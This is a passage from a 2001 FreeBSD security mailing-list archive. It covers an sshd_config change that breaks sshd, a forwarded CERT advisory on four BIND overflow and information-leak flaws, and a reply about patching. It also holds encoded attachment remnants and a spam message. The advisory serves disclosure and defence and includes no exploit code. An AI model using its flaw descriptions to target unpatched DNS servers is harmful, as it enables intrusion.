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 03gaT+NpfGH8BxhfD08AKAAA --0-1467619970-980427870=:401-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 8:16: 1 2001 Delivered-To: freebsd-security@freebsd.org Received: from hub.lovett.com (hub.lovett.com [216.60.121.161]) by hub.freebsd.org (Postfix) with ESMTP id B8A4B37B6A0 for ; Mon, 29 Jan 2001 08:15:43 -0800 (PST) Received: from ade by hub.lovett.com with local (Exim 3.20 #1) id 14NGwV-0004R5-00; Mon, 29 Jan 2001 10:14:11 -0600 Date: Mon, 29 Jan 2001 10:14:11 -0600 From: Ade Lovett To: Rasputin Cc: freebsd-security@freebsd.org, imp@village.org Subject: Re: OpenSSH b0rked (was RE: Problems with IPFW patch) Message-ID: <20010129101411.A16899@FreeBSD.org> References: <20010124230626.A49802@citusc17.usc.edu> <20010125103255.A78404@FreeBSD.org> <200101262153.f0QLrLL40016@earth.backplane.com> <20010129095752.A37233@dogma.freebsd-uk.eu.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010129095752.A37233@dogma.freebsd-uk.eu.org>; from rasputin@FreeBSD-uk.eu.org on Mon, Jan 29, 2001 at 09:57:53AM +0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Jan 29, 2001 at 09:57:53AM +0000, Rasputin wrote: > In general I'd agree with Matt and aDe, but if a directive > affecting security has changed, I'd say it's better to be notified of it > as soon as possible. > Killing off sshd obviously makes remote admin a real problem, though; > is there another way to guarantee we'd notice ? Well, something in /usr/src/UPDATING might have helped. Believe it or not, I do read it. Nothing there. Update -stable box, run mergemaster, ignore anything to do with ssh_config or sshd_config since ours are fairly heavily different, reboot, no sshd. If it's not going to be backed out (a serious mistake, IMO), then UPDATING needs to be modified at least: 200101xx The 'ConnectionsPerPeriod' directive in /etc/ssh/sshd_config has been deprecated. Please ensure that you either comment out, or preferably remove, this entry BEFORE REBOOTING. /usr/sbin/sshd after this date WILL NOT RUN with this directive in place, which is likely to cause substantial issues for headless machines. There. Another mighty victory for the Confederation. -aDe -- Ade Lovett, Austin, TX. ade@FreeBSD.org FreeBSD: The Power to Serve http://www.FreeBSD.org/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 8:31: 8 2001 Delivered-To: freebsd-security@freebsd.org Received: from giganda.komkon.org (giganda.komkon.org [209.125.17.66]) by hub.freebsd.org (Postfix) with ESMTP id 2AEC337B400; Mon, 29 Jan 2001 08:29:54 -0800 (PST) Received: (from str@localhost) by giganda.komkon.org (8.9.3/8.9.3) id LAA76025; Mon, 29 Jan 2001 11:29:51 -0500 (EST) (envelope-from str) From: Igor Roshchin Message-Id: <200101291629.LAA76025@giganda.komkon.org> Subject: Bind: FreeBSD-SA-01:10 and CERT Advisory CA-2001-02 To: security@freebsd.org Date: Mon, 29 Jan 2001 11:29:51 -0500 (EST) Cc: security-officer@freebsd.org X-Mailer: ELM [version 2.4ME+ PL61 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Two comments/questions: 1. FreeBSD-SA-01:10 (per ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-01:10.bind.asc) says: Affects: FreeBSD 3.x prior to the correction date. Ports collection prior to the correction date. Corrected: 2000-11-27 (FreeBSD 3.5-STABLE) 2001-01-05 (Ports collection) and then, in Problem description it explains: All versions of FreeBSD 3.x prior to the correction date including 3.5.1-RELEASE are vulnerable to this problem. In addition, the bind8 port in the ports collection is also vulnerable. FreeBSD 4.x is not affected since it contains versions of BIND 8.2.3. My COMMENT: ------- This is not true, because 4.0-RELEASE was shipped with named 8.2.2-P5-NOESW Mon Mar 20 20:43:54 GMT 2000 root@monster.cdrom.com:/usr/obj/usr/src/usr.sbin/named Thus, the statement in the advisory in question might be at least misleading. Therefore : My question: Is 8.2.2-P5-NOESW (shipped with 4.0-RELEASE) vulnerable to a) the problem described in FreeBSD-SA-01:10 b) the problem described in CERT Advisory CA-2001-02 (Multiple Vulnerabilities in BIND), VU#196945 (see that advisory at the bottom of this message). Since 3.5.1-RELEASE was packaged with the same version of bind: named 8.2.2-P5-NOESW Thu Jul 20 02:01:19 GMT 2000 jkh@monster.osd.bsdi.com:/usr/obj/usr/src/usr.sbin/named I assume the answer to the question a) is "yes". How about b) ? Also "yes" ? To the security officers: http://www.freebsd.org/security/#adv does not show any advisories on bind, except the one mentioned above. Will there be any advisory addressing the problem mentioned by the CERT advisory in regards to the older versions of FreeBSD (and BIND packaged with them)? Thanks, Igor ----- Forwarded message from CERT Advisory ----- [There is text before PGP section.] -- Start of PGP signed section. CERT Advisory CA-2001-02 Multiple Vulnerabilities in BIND Original release date: January 29, 2001 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected Domain Name System (DNS) Servers running various versions of ISC BIND (including both 4.9.x prior to 4.9.8 and 8.2.x prior to 8.2.3; 9.x is not affected) and derivatives. Because the normal operation of most services on the Internet depends on the proper operation of DNS servers, other services could be impacted if these vulnerabilities are exploited. Overview The CERT/CC has recently learned of four vulnerabilities spanning multiple versions of the Internet Software Consortium's (ISC) Berkeley Internet Name Domain (BIND) server. BIND is an implementation of the Domain Name System (DNS) that is maintained by the ISC. Because the majority of name servers in operation today run BIND, these vulnerabilities present a serious threat to the Internet infrastructure. Three of these vulnerabilities (VU#196945, VU#572183, and VU#868916) were discovered by the COVERT Labs at PGP Security, who have posted an advisory regarding these issues at http://www.pgp.com/research/covert/advisories/047.asp The fourth vulnerability (VU#325431) was discovered by Claudio Musmarra. The Internet Software Consortium has posted information about all four vulnerabilities at http://www.isc.org/products/BIND/bind-security.html I. Description VU#196945 - ISC BIND 8 contains buffer overflow in transaction signature (TSIG) handling code During the processing of a transaction signature (TSIG), BIND 8 checks for the presence of TSIGs that fail to include a valid key. If such a TSIG is found, BIND skips normal processing of the request and jumps directly to code designed to send an error response. Because the error-handling code initializes variables differently than in normal processing, it invalidates the assumptions that later function calls make about the size of the request buffer. Once these assumptions are invalidated, the code that adds a new (valid) signature to the responses may overflow the request buffer and overwrite adjacent memory on the stack or the heap. When combined with other buffer overflow exploitation techniques, an attacker can gain unauthorized privileged access to the system, allowing the execution of arbitrary code. VU#572183 - ISC BIND 4 contains buffer overflow in nslookupComplain() The vulnerable buffer is a locally defined character array used to build an error message intended for syslog. Attackers attempting to exploit this vulnerability could do so by sending a specially formatted DNS query to affected BIND 4 servers. If properly constructed, this query could be used to disrupt the normal operation of the DNS server process, resulting in either denial of service or the execution of arbitrary code. VU#868916 - ISC BIND 4 contains input validation error in nslookupComplain() The vulnerable buffer is a locally defined character array used to build an error message intended for syslog. Attackers attempting to exploit this vulnerability could do so by sending a specially formatted DNS query to affected BIND 4 servers. If properly constructed, this query could be used to disrupt the normal operation of the DNS server process, resulting in the execution of arbitrary code. This vulnerability was patched by the ISC in an earlier version of BIND 4, most likely BIND 4.9.5-P1. However, there is strong evidence to suggest that some third party vendors who redistribute BIND 4 have not included these changes in their BIND packages. Therefore, the CERT/CC recommends that all users of BIND 4 or its derivatives base their distributions on BIND 4.9.8. VU#325431 - Queries to ISC BIND servers may disclose environment variables This vulnerability is an information leak in the query processing code of both BIND 4 and BIND 8 that allows a remote attacker to access the program stack, possibly exposing program and/or environment variables. This vulnerability is triggered by sending a specially formatted query to vulnerable BIND servers. II. Impact VU#196945 - ISC BIND 8 contains buffer overflow in transaction signature (TSIG) handling code This vulnerability may allow an attacker to execute code with the same privileges as the BIND server. Because BIND is typically run by a superuser account, the execution would occur with superuser privileges. VU#572183 - ISC BIND 4 contains buffer overflow in nslookupComplain() This vulnerability can disrupt the proper operation of the BIND server and may allow an attacker to execute code with the privileges of the BIND server. Because BIND is typically run by a superuser account, the execution would occur with superuser privileges. VU#868916 - ISC BIND 4 contains input validation error in nslookupComplain() This vulnerability may allow an attacker to execute code with the privileges of the BIND server. Because BIND is typically run by a superuser account, the execution would occur with superuser privileges. VU#325431 - Queries to ISC BIND servers may disclose environment variables This vulnerability may allow attackers to read information from the program stack, possibly exposing environment variables. In addition, the information obtained by exploiting this vulnerability may aid in the development of exploits for VU#572183 and VU#868916. III. History Since 1997, the CERT/CC has published twelve documents describing vulnerabilities or exploitation of vulnerabilities in BIND with information and advice on upgrading and preventing compromises. Unfortunately, many system and network administrators still have not upgraded their versions of BIND, making them susceptible to a number of vulnerabilities. Prior vulnerabilities in BIND have been widely exploited by intruders. For example, on November 10, 1999, the CERT/CC published CA-1999-14, which detailed multiple vulnerabilities in BIND. The CERT/CC continued to receive reports of compromises based on those vulnerabilities through December 2000. On April 8, 1998, the CERT/CC published CA-1998-05; reports of compromises based on the vulnerabilities described therein continued through November of 1998. The following graph shows the number of incidents reported to the CERT/CC regarding BIND NXT record (VU#16532) exploits after the publication of CA-1999-14: Incidents By Month Involving the BIND NXT Record Vulnerability (VU#16532) Based on this past experience, the CERT/CC expects that intruders will quickly begin developing and using intruder tools to compromise machines. It is important for IT and security managers to ensure that their organizations are properly protected before the expected wide-spread exploitation happens. Exploitation The vulnerabilities described in VU#196945, VU#572183, and VU#868916 have been successfully exploited by COVERT Labs in a laboratory environment. To the best of our knowledge, no exploits have been released to the public. IV. Solution Apply a patch from your vendor The ISC has released BIND versions 4.9.8 and 8.2.3 to address these security issues. The CERT/CC recommends that users of BIND 4.9.x or 8.2.x upgrade to BIND 4.9.8, BIND 8.2.3, or BIND 9.1. Because BIND 4 is no longer actively maintained, the ISC recommends that users affected by this vulnerability upgrade to either BIND 8.2.3 or BIND 9.1. Upgrading to one of these versions will also provide functionality enhancements that are not related to security. The BIND 4.9.8 and 8.2.3 distributions can be downloaded from ftp://ftp.isc.org/isc/bind/src/ The BIND 9.1 distribution can be downloaded from ftp://ftp.isc.org/isc/bind9/ Appendix A contains information supplied by ISC and distributors of BIND. Depending on your local processes, procedures, and expertise, you may wish to obtain updates from the ISC or from an operating system vendor who redistributes BIND. Use Strong Cryptography to Authenticate Services Services and transactions that rely exclusively on the DNS system for authentication are inherently weak. We encourage organizations to use strong cryptography to authenicate services and transactions where possible. One common use of strong cryptography is the use of SSL in authenticating and encrypting electronic commerce transactions over the web. In addition to this use, we encourage organizations to use SSL, PGP, S/MIME, SSH, and other forms of strong cryptography to distribute executable content, secure electronic mail, distribute important information, and protect the confidentiality of all kinds of data traversing the Internet. Use Split Horizon DNS to Minimize Impact It may also be possible to minimize the impact of the exploitation of these vulnerabilities by configuring your DNS environment to separate DNS servers used for the public dissemination of information about your hosts from the DNS servers used by your internal hosts to connect to other hosts on the Internet. Frequently, different security polices can be applied to these servers such that even if one server is compromised the other server will continue to function normally. Split horizon DNS configuration may also have other security benefits. References To read more about the vulnerabilities described in this document, please visit the CERT/CC Vulnerability Notes Database: VU#196945 - ISC BIND 8 contains buffer overflow in transaction signature (TSIG) handling code http://www.kb.cert.org/vuls/id/196945 VU#572183 - ISC BIND 4 contains buffer overflow in nslookupComplain() http://www.kb.cert.org/vuls/id/572183 VU#868916 - ISC BIND 4 contains input validation error in nslookupComplain() http://www.kb.cert.org/vuls/id/868916 VU#325431 - Queries to ISC BIND servers may disclose environment variables http://www.kb.cert.org/vuls/id/325431 To cross-reference CERT/CC VU numbers with other vendor documents via CVE, please visit VU#196945 - ISC BIND 8 contains buffer overflow in transaction signature (TSIG) handling code http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0010 VU#572183 - ISC BIND 4 contains buffer overflow in nslookupComplain() http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0011 VU#868916 - ISC BIND 4 contains input validation error in nslookupComplain() http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0013 VU#325431 - Queries to ISC BIND servers may disclose environment variables http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0012 For information on historical issues involving BIND vulnerabilities and compromises, please visit CERT Advisory CA-2000-20 Multiple Denial-of-Service Problems in ISC BIND http://www.cert.org/advisories/CA-2000-20.html CERT Advisory CA-2000-03 Continuing Compromises of DNS servers http://www.cert.org/advisories/CA-2000-03.html CERT Advisory CA-1999-14 Multiple Vulnerabilities in BIND http://www.cert.org/advisories/CA-1999-14.html CERT Advisory CA-1998-05 Multiple Vulnerabilities in BIND http://www.cert.org/advisories/CA-1998-05.html CERT Advisory CA-1997-22 BIND - The Berkeley Internet Name Daemon http://www.cert.org/advisories/CA-1997-22.html CERT Summary CS-2000-02 http://www.cert.org/summaries/CS-2000-02.html CERT Summary CS-2000-01 http://www.cert.org/summaries/CS-2000-01.html CERT Summary CS-1999-04 http://www.cert.org/summaries/CS-99-04.html CERT Summary CS-1998-07 http://www.cert.org/summaries/CS-98.07.html CERT Summary CS-1998-06 http://www.cert.org/summaries/CS-98.06.html CERT Summary CS-1998-05 http://www.cert.org/summaries/CS-98.05.html CERT Summary CS-1998-04 http://www.cert.org/summaries/CS-98.04.html For more information on transaction signatures, please visit RFC 2535: Domain Name System Security Extensions http://www.ietf.org/rfc/rfc2535.txt RFC 2845: Secret Key Transaction Authentication for DNS (TSIG) http://www.ietf.org/rfc/rfc2845.txt Appendix A. - Vendor Information This appendix contains information provided by vendors for this advisory. When vendors report new information to the CERT/CC, we update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Caldera Systems OpenLinux 2.3, eServer 2.3.1 and eDesktop 2.4 are all vulnerable. Update packages will be provided at ftp://ftp.calderasystems.com/pub/updates/OpenLinux/2.3 ftp://ftp.calderasystems.com/pub/updates/OpenLinux/2.3 ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4 Compaq Computer Corporation COMPAQ COMPUTER CORPORATION ------------------------------------------------------------------------------- ----- VU#325431 INFOLEAK ------------------------------------------------------------------------------- ----- Compaq Tru64 UNIX V5.1 and V5.0 *evaluation incomplete Compaq Tru64 UNIX V4.0D/F/G *evaluation incomplete ------------------------------------------------------------------------------- ----- VU#572183 - buffer overflow in nslookupComplain() VU#868916 - input validation error in nslookupComplain() ------------------------------------------------------------------------------- ----- Compaq Tru64 UNIX V5.1 and V5.0 - Not Vulnerable Compaq Tru64 UNIX V4.0D/F/G - *evaluation incomplete. ------------------------------------------------------------------------------- ----- VU#196945 - BIND 8 contains buffer overflow in transaction signature handling code ------------------------------------------------------------------------------- ----- Compaq Tru64 UNIX V5.1 and V5.0 - *evaluation incomplete Compaq Tru64 UNIX V4.0D/F/G - Not Vulnerable * At the time of writing this document, the problems identified are currently still under evaluation by engineering. Compaq will provide notice of the completion/availability of the patches through AES services (DIA, DSNlink FLASH), the ** Security mailing list, and be available from your normal Compaq Support channel. **You may subscribe to the Security mailing list at: http://www.support.compaq.com/patches/mailing-list.shtml COMPAQ COMPUTER CORPORATION ------------------------------------------------------------------------------- ----- FreeBSD, Inc. No supported version of FreeBSD contains BIND 4.x, so this does not affect us. We current ship betas of 8.2.3 in the FreeBSD 4.x release branch, and will be upgrading to 8.2.3 once it is released. Hewlett-Packard Company None of the Bind versions of HP-UX is vulnerable to VU#196945 - problem of buffer overflow in TSIG handling code. HP's Bind 8.1.2 is vulnerable to VU#325183 (infoleak problem). Bind 4.9.7 is vulnerable to both VU#572183 (infoleak problem) and VU#325183 (nslookupComplain() buffer overflow). Fixes are in process. IBM Corporation VU#325431 - Queries to ISC BIND servers may disclose environment variables IBM's AIX operating system may be vulnerable to this "inverse query" exploitation. We are working to understand the technical nature of this exploit; when done, we expect to verify AIX's vulnerability. We will provide updates to this page as we progress [in] studying this exploit. VU#572183 - ISC BIND 4 contains buffer overflow in nslookupComplain() IBM's AIX operating system is vulnerable to this potential exploit in named4. We are working to fix this quickly and we intend to post an emergency fix ASAP. VU#868916 - ISC BIND 4 contains input validation error in nslookupComplain() IBM's AIX operating system is vulnerable to this potential exploit, and is working quickly toward a fix. Sun Microsystems, Inc. Solaris(tm) versions 2.4, 2.5, 2.5.1 and 2.6 contain revisions of BIND 4 Solaris(tm) versions 7 and 8 contain BIND 8.1.2 Sun is working to address the issues in VU#868916, VU#572183 and VU#325431 and will be issuing a Sun Security Bulletin when further information is available. VU#196945 is not present in currently supported versions of Solaris. _________________________________________________________________ The CERT/CC thanks the COVERT Labs at PGP Security for discovering and analyzing three of these vulnerabilities (VU#196945, VU#572183, and VU#868916) and Claudio Musmarra for discovering the infoleak vulnerability (VU#325431). We also thank the Internet Software Consortium for providing patches to fix the vulnerabilities. _________________________________________________________________ This document was written by Jeffrey P. Lanza, Cory Cohen, Ian Finlay, and Shawn Hernan. ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2001-02.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2001 Carnegie Mellon University. Revision History January 29, 2001: Initial release -- End of PGP signed section, PGP failed! ----- End of forwarded message from CERT Advisory ----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 9:21:34 2001 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 2342137B402; Mon, 29 Jan 2001 09:21:14 -0800 (PST) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.11.1/8.11.1) with SMTP id f0THKtB17653; Mon, 29 Jan 2001 12:20:55 -0500 (EST) (envelope-from robert@fledge.watson.org) Date: Mon, 29 Jan 2001 12:20:55 -0500 (EST) From: Robert Watson X-Sender: robert@fledge.watson.org To: Igor Roshchin Cc: security@freebsd.org, security-officer@freebsd.org, asmodai@freebsd.org Subject: Re: Bind: FreeBSD-SA-01:10 and CERT Advisory CA-2001-02 In-Reply-To: <200101291629.LAA76025@giganda.komkon.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > To the security officers: http://www.freebsd.org/security/#adv does not > show any advisories on bind, except the one mentioned above. Will there > be any advisory addressing the problem mentioned by the CERT advisory in > regards to the older versions of FreeBSD (and BIND packaged with them)? I won't attempt to address the other issues in your e-mail, leaving them to Kris, as I'm not familiar with them, but I can address the concern of the most recent BIND8 vulnerabilities. We were made aware of the CERT advisory before its release, but were waiting for the new 8.2.3 release to be made before importing it into the tree (the final pre-release did not include the fix, although that's what is in -STABLE I believe). The release has now been made, and 8.2.3 has been imported into the FreeBSD contrib tree. 5.0-CURRENT now uses 8.2.3 by default as of last night or this morning, and as soon as the testing is done on 4.2-STABLE, it will be enabled there also. The BIND8 maintainer for FreeBSD has assured me that the integration into -STABLE will be done sometime this evening, meaning we can push out an advisory in the next day or so (once testing is done, etc). Given that the maintainer has also been working on the RELENG_3 branch, I would imagine that the fix will also be made on that branch. I do not know what the plans are with regards to RELENG_2. I will talk to the maintainer about what is involved to assemble appropriate instructions to upgrade release machines as opposed to -STABLE branch machines. As this is a sizable update (import of an entire version of BIND), those instructions may be non-trivial in length. It may be that we want to assemble a tarball of the updated files to drop on a 4.2-RELEASE src/ tree. Robert N M Watson FreeBSD Core Team, TrustedBSD Project robert@fledge.watson.org NAI Labs, Safeport Network Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 9:26:44 2001 Delivered-To: freebsd-security@freebsd.org Received: from web1.renley.com (unknown [210.176.231.28]) by hub.freebsd.org (Postfix) with ESMTP id 2583B37B69B; Mon, 29 Jan 2001 09:25:30 -0800 (PST) Received: from 210.176.231.28 (unverified [203.149.188.102]) by web1.renley.com (Rockliffe SMTPRA 2.1.2) with SMTP id ; Tue, 30 Jan 2001 01:34:00 +0800 Date: Tue, 30 Jan 2001 01:34:00 +0800 Message-ID: Reply-To: l705723712@yahoo.com From: l705723712@yahoo.com To: 20guido@freebsd.org Subject:¨g¤H¸ê°T³nÅé§ó·s¸ê°T ¥»¦¸·s¼W¤@¦Ê¤T¤Q¦h¤ù¡D¡D¡D¡D¡D¡D¨g¤H¸ê°T³nÅé§ó·s¸ê°T¨g¤H¸ê°T³nÅé§ó·s¸ê°T ¥»¦¸·s¼W¤@¦Ê¤T¤Q¦h¤ù¡D¡D¡D¨g¤H¸ê°T³nÅé§ó·s¸ê°T ¥»¦¸·s¼W¤@¦Ê¤T¤Q¦h¤ù¡D¡D MIME-Version: 1.0 Content-Type: text/html; charset=big5 Content-Transfer-Encoding: base64 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org PGh0bWw+DQoNCjxoZWFkPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1MYW5ndWFnZSIg Y29udGVudD0iemgtdHciPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250 ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9YmlnNSI+DQo8bWV0YSBuYW1lPSJHRU5FUkFUT1Ii IGNvbnRlbnQ9Ik1pY3Jvc29mdCBGcm9udFBhZ2UgNC4wIj4NCjxtZXRhIG5hbWU9IlByb2dJ ZCIgY29udGVudD0iRnJvbnRQYWdlLkVkaXRvci5Eb2N1bWVudCI+DQo8dGl0bGU+q2Wpubr0 r7g8L3RpdGxlPg0KPC9oZWFkPg0KDQo8Ym9keT4NCg0KPGRpdiBhbGlnbj0iY2VudGVyIj4N CiAgPGNlbnRlcj4NCiAgPHRhYmxlIGJvcmRlcj0iMSIgd2lkdGg9IjQ1MSIgaGVpZ2h0PSIx MyI+DQogICAgPHRyPg0KICAgICAgPHRkIHdpZHRoPSI0NTEiIGhlaWdodD0iMTMiIGJnY29s b3I9IiM4MDgwODAiPjxzdHJvbmc+DQogICAgICAgIDxhIGhyZWY9Imh0dHA6Ly9nby50by9j cmF6eXgxIj4NCiAgICAgICAgPGZvbnQgY29sb3I9IiNGRkZGRkYiPg0KICAgICAgICA8bWFy cXVlZSBhbGlnbj0ibWlkZGxlIiBiZWhhdmlvcj0iYWx0ZXJuYXRlIj6rZam5qGekSLjqsFSl 5qx5pKSk37r0r7g8L21hcnF1ZWU+DQogICAgICAgIDwvZm9udD4NCiAgICAgICAgPC9hPg0K ICAgICAgICA8L3N0cm9uZz48L3RkPg0KICAgIDwvdHI+DQogIDwvdGFibGU+DQogIDwvY2Vu dGVyPg0KPC9kaXY+DQo8Zm9udCBTSVpFPSIzIj4NCjxibG9ja3F1b3RlPg0KICA8YmxvY2tx dW90ZT4NCiAgICA8YmxvY2txdW90ZT4NCiAgICAgIDxwIGFsaWduPSJsZWZ0Ij48Zm9udCBj b2xvcj0iI0ZGMDAwMCI+oXWp2rW0sbWo/KF2pbuvuLBUrqe90MJJv++hQDxhIGhyZWY9Im1h aWx0bzpmcmVlYmFua25vQDEwOC56em4uY29tIj6zb7jMPC9hPjwvZm9udD48L3A+DQogICAg ICA8cCBhbGlnbj0ibGVmdCI+PGZvbnQgY29sb3I9IiNGRjAwMDAiPqW7r7imYqasqOyxeqq6 pl7C0K7JoUGlsrftusmzdKjDq0/D0qdSsKOxeqq6uOquxqFDpbuvuKjDpKO3UbN5pqi0Y6nK tGDA9KFJPC9mb250PjwvcD4NCiAgICAgIDxwIGFsaWduPSJsZWZ0Ij48Zm9udCBjb2xvcj0i I0ZGMDAwMCI+oXXEQLdOsbWo/KF2pbuvuLBUrqe90MJJv++hQDxhIGhyZWY9Im1haWx0bzpm cmVlYmFua3llc0AxMDguenpuLmNvbSI+s2+4zDwvYT48L2ZvbnQ+PC9wPg0KICAgICAgPHAg 